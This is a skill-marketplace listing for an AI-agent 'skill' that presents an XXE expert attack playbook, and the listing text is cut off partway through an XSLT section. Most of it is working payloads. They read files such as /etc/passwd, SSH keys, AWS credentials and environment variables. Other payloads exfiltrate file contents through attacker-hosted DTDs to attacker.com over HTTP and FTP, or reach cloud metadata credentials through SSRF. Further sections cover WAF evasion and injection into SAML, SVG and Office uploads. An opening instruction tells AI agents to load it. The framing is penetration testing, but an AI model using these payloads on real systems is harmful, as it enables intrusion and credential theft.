首页/安全与合规/xxe-xml-external-entity
X

xxe-xml-external-entity

by @yaklangv
4.3(120)

此技能提供 XML 外部实体注入 (XXE) 漏洞的专家级攻击指南,涵盖各种注入场景(如 SOAP、REST、Office 文件、SVG),以及带外数据窃取和盲注检测技术。它能帮助安全研究人员和渗透测试工程师识别并利用 XXE 漏洞,从而发现潜在的数据泄露或服务器端请求伪造 (SSRF) 风险,有效提升 Web 应用的安全性评估能力。

penetration-testingxxexml-securityvulnerability-assessmentcybersecurityGitHub
安装方式
npx skills add https://github.com/yaklang/hack-skills --skill xxe-xml-external-entity
compare_arrows

Before / After 效果对比

1
使用前

用户在没有此技能之前,手动检测 XML 外部实体注入 (XXE) 漏洞时,需要耗费大量时间尝试各种 XML 解析器和上下文,尤其是在面对盲注或需要带外数据窃取时,往往难以发现或验证漏洞,导致安全评估效率低下,容易遗漏关键风险。

使用后

此技能能系统化地指导用户识别并利用 XXE 漏洞,提供多种攻击载荷和数据窃取方法,显著缩短漏洞发现和验证的时间。该 Skill 使得即使在复杂或盲注场景下也能高效地进行渗透测试,确保关键数据不会因 XXE 漏洞而泄露,从而大幅提升安全评估的覆盖率和准确性。

SKILL.md

SKILL: XML External Entity Injection (XXE) — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion SCENARIOS.md.

0. RELATED ROUTING

Also load:

Extended Scenarios

Also load SCENARIOS.md when you need:

  • Apache Solr XXE + RCE chain (CVE-2017-12629) — XXE to read config, then VelocityResponseWriter for RCE
  • Office docx XXE step-by-step — unzip → inject DOCTYPE into word/document.xml or [Content_Types].xml → repackage → upload
  • DOCTYPE-based blind SSRF — PUBLIC external DTD reference triggers HTTP callback without entity reflection
  • PHP expect:// protocol via XXE — direct command execution when expect extension is installed
  • Blind XXE via error messages — force file path error that leaks content in exception text
  • XXE in SOAP web services — inject entities into SOAP Envelope/Body elements

1. CLASSIC XXE PAYLOAD

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

If /etc/passwd reflects in response → confirmed file read.


2. ATTACK SURFACE DISCOVERY

Direct XML Inputs

  • SOAP endpoints (text/xml, application/soap+xml)
  • REST APIs accepting application/xml
  • File upload: .xlsx, .docx, .pptx (Office Open XML)
  • SVG uploads (SVG is XML)
  • RSS/Atom feed parsers
  • Web services with XML config import

Non-Obvious XML Processing

Change Content-Type header on any JSON POST to:

Content-Type: application/xml

Then rewrite body as XML — many backends use dual-format parsers or auto-detect.

PDF Generators

Some HTML→PDF tools (wkhtmltopdf, PrinceXML) execute SSRF via embedded URLs but also parse external entities in SVG/XML included in the HTML.


3. OOB (OUT-OF-BAND) XXE — CRITICAL

Use when direct entity reflection fails (server parses but doesn't echo entity content):

Step 1: Blind detection

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP_COLLABORATOR/">]>
<root>&xxe;</root>

DNS/HTTP hit to collaborator → confirms XXE (even if no file content returned).

Step 2: OOB file exfiltration via attacker-hosted DTD

Attacker's server hosts a malicious DTD at http://attacker.com/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;

Payload sent to target:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root>&exfiltrate;</root>

File contents appear in attacker's HTTP server request log.

Step 3: Error-based OOB (alternative when HTTP blocked)

Use intentional error to leak data in error message:

<!-- attacker.com/error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///NONEXISTENT/%file;'>">
%eval;
%error;

4. XXE FILE READ TARGETS

Linux:

/etc/passwd
/etc/shadow  (requires root)
/etc/hosts
/proc/self/environ      ← environment variables (DB creds, API keys)
/proc/self/cmdline      ← process command line
/var/log/apache2/access.log  ← may contain passwords in URLs
/home/USER/.ssh/id_rsa  ← SSH private key
/home/USER/.aws/credentials ← AWS keys
/home/USER/.bash_history

Windows:

C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config    ← ASP.NET connection strings
C:\xampp\htdocs\wp-config.php    ← WordPress DB credentials
C:\Users\Administrator\.ssh\id_rsa

5. SVG XXE (file upload context)

When SVG uploads are accepted and served/processed:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">
  <text font-size="16">&xxe;</text>
</svg>

Upload as .svgGET /uploads/file.svg → file contents in response.


6. OFFICE FILE XXE (docx/xlsx/pptx)

Office files are ZIP archives containing XML. Inject into [Content_Types].xml or word/document.xml:

# Step 1: extract
unzip original.docx -d extracted/

# Step 2: edit word/document.xml — add malicious DTD
# Add after <?xml version="1.0" encoding="UTF-8" standalone="yes"?>:
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Then use &xxe; inside document text

# Step 3: repackage
cd extracted && zip -r ../malicious.docx .

7. SOAP ENDPOINT XXE

SOAP requests parse XML by definition. Inject external entity into SOAP envelope:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUser>
      <id>&xxe;</id>
    </getUser>
  </soap:Body>
</soap:Envelope>

8. XXE → SSRF CHAIN

XXE external entity can point to internal HTTP endpoints (identical to SSRF):

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>

This combines XXE file read + SSRF into a single payload.


9. XInclude ATTACK

When server-side processes XInclude (import XML from another source), but you can't control the DOCTYPE:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd" parse="text"/>
</foo>

Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled.


10. PROTOCOL HANDLERS IN XXE

<!-- HTTP (SSRF) -->
<!ENTITY xxe SYSTEM "http://internal.company.com/admin/">

<!-- File read -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- PHP wrapper (if PHP with libxml2) -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!-- Decode base64 in response to get file contents -->

<!-- FTP (exfil / port scan) -->
<!ENTITY xxe SYSTEM "ftp://attacker.com:21/x">

<!-- Gopher (Redis, SMTP) -->
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/info%0d%0a">

11. BYPASSING DEFENSES

Parser blocks DOCTYPE

Try XInclude (no DOCTYPE needed, see §9).

Only allows specific XML schemas

If schema validation occurs: inject comments or CDATA after schema validation but before entity processing.

Response encoding issues (binary in response)

Use PHP filter for base64:

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

Network restrictions on OOB

Use DNS-only OOB via SYSTEM "file://HASH.attacker.com" — no HTTP required, DNS lookup leaks data.


12. QUICK DETECTION CHECKLIST

□ Find XML input point (or JSON→XML transformation)
□ Send basic entity: <!ENTITY xxe "test"> → &xxe; in body → does "test" reflect?
□ If yes → file read: SYSTEM "file:///etc/passwd"
□ If no reflection → OOB test via Collaborator URL
□ If OOB hit → set up attacker DTD for file exfiltration
□ Try SVG upload with XXE
□ Try Content-Type: application/xml on JSON endpoints
□ Try XInclude if DOCTYPE-based fails

13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION)

When external entities are blocked but local DTD files exist on the server:

Technique

<!-- Override an entity defined in a LOCAL DTD file -->
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>

Common Local DTD Paths

Linux

/usr/share/yelp/dtd/docbookx.dtd           # GNOME Help
/usr/share/xml/fontconfig/fonts.dtd         # Fontconfig
/usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd
/usr/share/struts/struts-config_1_0.dtd     # Apache Struts
/usr/share/nmap/nmap.dtd                    # Nmap
/opt/zaproxy/xml/alert.dtd                  # OWASP ZAP

Windows

C:\Windows\System32\wbem\xml\cim20.dtd            # WMI
C:\Windows\System32\wbem\xml\wmi20.dtd             # WMI
C:\Program Files\IBM\WebSphere\*.dtd               # WebSphere
C:\Program Files (x86)\Lotus\*.dtd                 # Lotus Notes

Inside JAR Files (Java Applications)

jar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd
jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd
file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtd

Why This Works

  • External connections blocked (firewall/WAF/egress filter)
  • But file:// to LOCAL files is usually allowed
  • Local DTD is trusted → entity overrides inject attacker-controlled definitions
  • Error messages or blind extraction via file:// still works

14. ADDITIONAL OOB EXFILTRATION CHANNELS

FTP-based exfiltration (line-by-line)

FTP protocol sends data line-by-line, making it useful for multi-line file exfiltration when HTTP-based OOB truncates at newlines:

<!-- attacker.com/ftp-exfil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'ftp://attacker.com:2121/%file;'>">
%exfil;
%send;

Run a rogue FTP server (e.g., xxeserv or custom Python) on port 2121 — each line of the file arrives as a separate RETR or CWD command.

HTTP parameter exfiltration

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?d=%file;'>">
%exfil;
%send;

Base64 encoding avoids newline/special-character issues in HTTP URL. Decode the d= parameter on attacker server.


15. DTD NESTING TRICKS — PARAMETER ENTITY CHAINING

Parameter entity within parameter entity

Used to bypass parsers that block direct entity references in entity values:

<!DOCTYPE foo [
  <!ENTITY % a "&#x25; b;">
  <!ENTITY % b SYSTEM "http://attacker.com/chain.dtd">
  %a;
]>

The parser expands %a;%b; → fetches external DTD. Some WAFs only inspect the first level of entity definitions.

Triple-nested for filter evasion

<!-- attacker.com/stage1.dtd -->
<!ENTITY % s2 SYSTEM "http://attacker.com/stage2.dtd">
%s2;

<!-- attacker.com/stage2.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % s3 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%s3;
%exfil;

Payload sent to target only references stage1.dtd — the actual file read happens two DTD fetches deep, evading shallow WAF inspection.


16. XXE IN NON-OBVIOUS FORMATS

FormatXML LocationInjection Point
SOAP EnvelopeEntire body is XMLAdd DOCTYPE before <soap:Envelope>
SVG ImageSVG is XML<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> in SVG header
OOXML (.docx)word/document.xml, [Content_Types].xmlInject DOCTYPE + entity into any XML member
OOXML (.xlsx)xl/sharedStrings.xml, xl/worksheets/sheet1.xmlEntity reference in cell values
RSS/Atom feedsFeed body is XMLInject into feed items if user content is included
SAML assertionsSAML XML tokensDOCTYPE injection in SAMLResponse parameter (base64-decoded XML)
XMPPProtocol messages are XML stanzasEntity in message body or JID fields
GPX filesGPS track data in XMLVia file upload endpoints accepting GPX
XHTMLStrict XHTML is valid XMLDOCTYPE injection in XHTML documents

SAML XXE

<!-- Base64-decode the SAMLResponse, inject DOCTYPE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Assertion>
    <saml:Subject>
      <saml:NameID>&xxe;</saml:NameID>
    </saml:Subject>
  </saml:Assertion>
</samlp:Response>

Re-encode to base64, submit as SAMLResponse parameter.


17. XXE VIA FILE UPLOAD

SVG upload

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="500">
  <text x="10" y="50" font-size="14">&xxe;</text>
</svg>

Upload as avatar/image → view uploaded SVG → file content rendered as text.

XLSX (Excel) upload

# 1. Create minimal .xlsx, unzip it
unzip report.xlsx -d xlsx_tmp/

# 2. Inject into xl/sharedStrings.xml
# Add after XML declaration:
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Replace a <t> element content with &xxe;

# 3. Repackage
cd xlsx_tmp && zip -r ../malicious.xlsx .

Alternatively inject into [Content_Types].xml (parsed first by most OOXML processors).

DOCX upload

# Target: word/document.xml
# Same approach: unzip → inject DOCTYPE + entity → repackage

# Alternative: inject into customXml/item1.xml if custom XML parts exist

Processing pipeline attack

Even if the uploaded file is not directly rendered, the server-side parser (Apache POI, python-docx, OpenXML SDK) may process entities during import, triggering OOB exfiltration.


18. ERROR-BASED XXE

Force the XML parser to generate an error message containing file content:

Method 1: Non-existent file reference

<!-- attacker.com/error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser attempts to open file:///nonexistent/<hostname_content> → error message includes the hostname value.

Method 2: XML schema validation error

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'jar:file:///nonexistent!/%file;'>">
  %eval;
  %err;
]>

The jar: protocol handler generates verbose error messages that include the expanded entity value.

Method 3: Integer overflow / type error

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#x25; trick SYSTEM 'file:///%file;'>">
%int;
%trick;

Parser tries to open a file path containing the target file content → error message reveals content.


19. XSLT INJECTION CONNECTION TO XXE

XSLT processors parse XML and can be chained with XXE:

XSLT file read

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="document('file:

...

用户评价 (0)

发表评价

效果
易用性
文档
兼容性

暂无评价

统计数据

安装量1.1K
评分4.3 / 5.0
版本
更新日期2026年6月9日
对比案例1 组

用户评分

4.3(120)
5
37%
4
43%
3
13%
2
5%
1
2%

为此 Skill 评分

0.0

兼容平台

🤖claude-code

时间线

创建2026年6月7日
最后更新2026年6月9日
🎁 Agent 知识卡片